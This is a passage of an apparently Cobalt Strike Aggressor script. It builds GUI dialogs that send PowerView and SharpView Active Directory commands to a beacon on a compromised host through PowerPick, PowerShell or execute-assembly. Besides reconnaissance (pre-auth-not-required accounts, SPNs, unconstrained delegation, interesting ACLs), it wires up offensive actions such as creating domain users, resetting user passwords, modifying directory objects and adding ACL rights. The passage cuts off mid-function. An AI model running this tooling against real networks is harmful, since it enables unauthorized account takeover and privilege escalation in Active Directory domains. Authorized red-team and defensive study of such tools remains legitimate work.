    drow_text($dialog, 'SecurityMasks', 'SecurityMasks');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'AdminCount', 'AdminCount');
    drow_checkbox($dialog, 'SPN', 'SPN');
    drow_checkbox($dialog, 'AllowDelegation', 'AllowDelegation');
    drow_checkbox($dialog, 'DisallowDelegation', 'DisallowDelegation');
    drow_checkbox($dialog, 'TrustedToAuth', 'TrustedToAuth');
    drow_checkbox($dialog, 'PreauthNotRequired', 'PreauthNotRequired');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_checkbox($dialog, 'FindOne', 'FindOne');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub newdomainuser{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 New-DomainUser", %(execmethod => "PowerPick", SamAccountName => "", AccountPassword => "", Name => "", DisplayName => "", Description => "", Domain => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpnewdomainuser()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView New-DomainUser via PowerPick');
            bpowerpick($bid, ''.$creds.'New-DomainUser'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView New-DomainUser via PowerShell');
            bpowershell($bid, ''.$creds.'New-DomainUser'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView New-DomainUser via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'New-DomainUser'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Creates a new domain user (assuming appropriate permissions) and returns the user object");
    drow_text($dialog, 'SamAccountName', 'SamAccountName');
    drow_text($dialog, 'AccountPassword', 'AccountPassword');
    drow_text($dialog, 'Name', 'Name');
    drow_text($dialog, 'DisplayName', 'DisplayName');
    drow_text($dialog, 'Description', 'Description');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub setdomainuserpassword{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Set-DomainUserPassword", %(execmethod => "PowerPick", Identity => "", AccountPassword => "", Domain => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpsetdomainuserpassword()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Set-DomainUserPassword via PowerPick');
            bpowerpick($bid, ''.$creds.'Set-DomainUserPassword'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Set-DomainUserPassword via PowerShell');
            bpowershell($bid, ''.$creds.'Set-DomainUserPassword'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Set-DomainUserPassword via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Set-DomainUserPassword'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Sets the password for a given user identity");
    drow_text($dialog, 'Identity', 'Identity');
    drow_text($dialog, 'AccountPassword', 'AccountPassword');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomainuserevent{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainUserEvent", %(execmethod => "PowerPick", ComputerName => "", StartTime => "", EndTime => "", MaxEvents => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomainuserevent()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainUserEvent via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainUserEvent'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainUserEvent via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainUserEvent'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainUserEvent via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainUserEvent'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Enumerate account logon events (ID 4624) and Logon with explicit credential events (ID 4648) from the specified host (default of the localhost)");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'StartTime', 'StartTime');
    drow_text($dialog, 'EndTime', 'EndTime');
    drow_text($dialog, 'MaxEvents', 'MaxEvents');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomaincomputer{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainComputer", %(execmethod => "PowerPick", Identity => "", UACFilter => "", Unconstrained => "false", TrustedToAuth => "false", Printers => "false", SPN => "", OperatingSystem => "", ServicePack => "", SiteName =>  "", Ping => "false", Domain => "", LDAPFilter => "", Properties => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", SecurityMasks => "", Tombstone => "false", FindOne => "false", Credential => "", Raw => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomaincomputer()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainComputer via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainComputer'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainComputer via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainComputer'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainComputer via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainComputer'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Return all computers or specific computer objects in AD");
    drow_text($dialog, 'Identity', 'Identity');
    drow_text($dialog, 'UACFilter', 'UACFilter');
    drow_text($dialog, 'SPN', 'SPN');
    drow_text($dialog, 'OperatingSystem', 'OperatingSystem');
    drow_text($dialog, 'ServicePack', 'ServicePack');
    drow_text($dialog, 'SiteName', 'SiteName');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'Properties', 'Properties');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'SecurityMasks', 'SecurityMasks');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'FindOne', 'FindOne');
    drow_checkbox($dialog, 'Ping', 'Ping');
    drow_checkbox($dialog, 'Printers', 'Printers');
    drow_checkbox($dialog, 'Unconstrained', 'Unconstrained');
    drow_checkbox($dialog, 'TrustedToAuth', 'TrustedToAuth');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_checkbox($dialog, 'Raw', 'Raw');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomainobject{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainObject", %(execmethod => "PowerPick", Identity => "", UACFilter => "", Domain => "", LDAPFilter => "", Properties => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", SecurityMasks => "", Tombstone => "false", FindOne => "false", Credential => "", Raw => "false"), lambda({
        if ($2 eq  'Help'){
            helpgetdomainobject()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainObject via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainObject'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainObject via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainObject'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainObject via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainObject'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Return all (or specified) domain objects in AD");
    drow_text($dialog, 'Identity', 'Identity');
    drow_text($dialog, 'UACFilter', 'UACFilter');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'Properties', 'Properties');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'SecurityMasks', 'SecurityMasks');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_checkbox($dialog, 'FindOne', 'FindOne');
    drow_checkbox($dialog, 'Raw', 'Raw');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub setdomainobject{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Set-DomainObject", %(execmethod => "PowerPick", Identity => "", Set => "", XOR => "", Clear => "", Domain => "", LDAPFilter => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpsetdomainobject()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Set-DomainObject via PowerPick');
            bpowerpick($bid, ''.$creds.'Set-DomainObject'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Set-DomainObject via PowerShell');
            bpowershell($bid, ''.$creds.'Set-DomainObject'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Set-DomainObject via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Set-DomainObject'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Modifies a gven property for a specified active directory object");
    drow_text($dialog, 'Identity', 'Identity');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'Properties', 'Properties');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomainobjectacl{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainObjectAcl", %(execmethod => "PowerPick", Identity => "", Sacl => "", ResolveGUIDs => "", RightsFilter => "", Domain => "", LDAPFilter => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomainobjectacl()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainObjectAcl via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainObjectAcl'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainObjectAcl via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainObjectAcl'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainObjectAcl via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainObjectAcl'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns the ACLs associated with a specific active directory object. By default the DACL for the object(s) is returned, but the SACL can be returned with -Sacl");
    drow_text($dialog, 'Identity', 'Identity');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'Properties', 'Properties');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub adddomainobjectacl{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Add-DomainObjectAcl", %(execmethod => "PowerPick", TargetIdentity => "", TargetDomain => "", TargetLDAPFilter => "", TargetSearchBase => "", PrincipalIdentity => "", PrincipalDomain => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => "", Rights => "", RightsGUID => ""), lambda({
        if ($2 eq  'Help'){
            helpadddomainobjectacl()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Add-DomainObjectAcl via PowerPick');
            bpowerpick($bid, ''.$creds.'Add-DomainObjectAcl'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Add-DomainObjectAcl via PowerShell');
            bpowershell($bid, ''.$creds.'Add-DomainObjectAcl'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Add-DomainObjectAcl via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Add-DomainObjectAcl'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Adds an ACL for a specific active directory object");
    drow_text($dialog, 'TargetIdentity', 'TargetIdentity');
    drow_text($dialog, 'TargetDomain', 'TargetDomain');
    drow_text($dialog, 'TargetLDAPFilter', 'TargetLDAPFilter');
    drow_text($dialog, 'TargetSearchBase', 'TargetSearchBase');
    drow_text($dialog, 'PrincipalIdentity', 'PrincipalIdentity');
    drow_text($dialog, 'PrincipalDomain', 'PrincipalDomain');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_text($dialog, 'Rights', 'Rights');
    drow_text($dialog, 'RightsGUID', 'RightsGUID');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub findinterestingdomainacl{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Find-InterestingDomainAcl", %(execmethod => "PowerPick", Domain => "", ResolveGUIDs => "false", LDAPFilter => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpfindinterestingdomainacl()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Find-InterestingDomainAcl via PowerPick');
            bpowerpick($bid, ''.$creds.'Find-InterestingDomainAcl'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Find-InterestingDomainAcl via PowerShell');
            bpowershell($bid, ''.$creds.'Find-InterestingDomainAcl'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Find-InterestingDomainAcl via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Find-InterestingDomainAcl'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Finds object ACLs in the current (or specified) domain with modification rights set to non-built in objects");
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'ResolveGUIDs', 'ResolveGUIDs');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomainou{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainOU", %(execmethod => "PowerPick", Identity => "", GPLink => "", Domain => "", LDAPFilter => "", Properties => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", SecurityMasks => "", FindOne => "false", Tombstone => "false", Credential => "", Raw => "false"), lambda({
        if ($2 eq  'Help'){
            helpgetdomainou()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainOU via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainOU'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainOU via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainOU'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainOU via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainOU'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Search for all organization units (OUs) or specific OU objects in AD");
    drow_text($dialog, 'Identity', 'Identity');
    drow_text($dialog, 'GPLink', 'GPLink');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'Properties', 'Properties');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'SecurityMasks', 'SecurityMasks');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'FindOne', 'FindOne');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_checkbox($dialog, 'Raw', 'Raw');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomainsite{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainSite", %(execmethod => "PowerPick", Identity => "", GPLink => "", Domain => "", LDAPFilter => "", Properties => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", SecurityMasks => "", FindOne => "false", Tombstone => "false", Credential => "", Raw => "false"), lambda({
        if ($2 eq  'Help'){
            helpgetdomainsite()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainSite via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainSite'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainSite via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainSite'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainSite via Execute-Assembly');
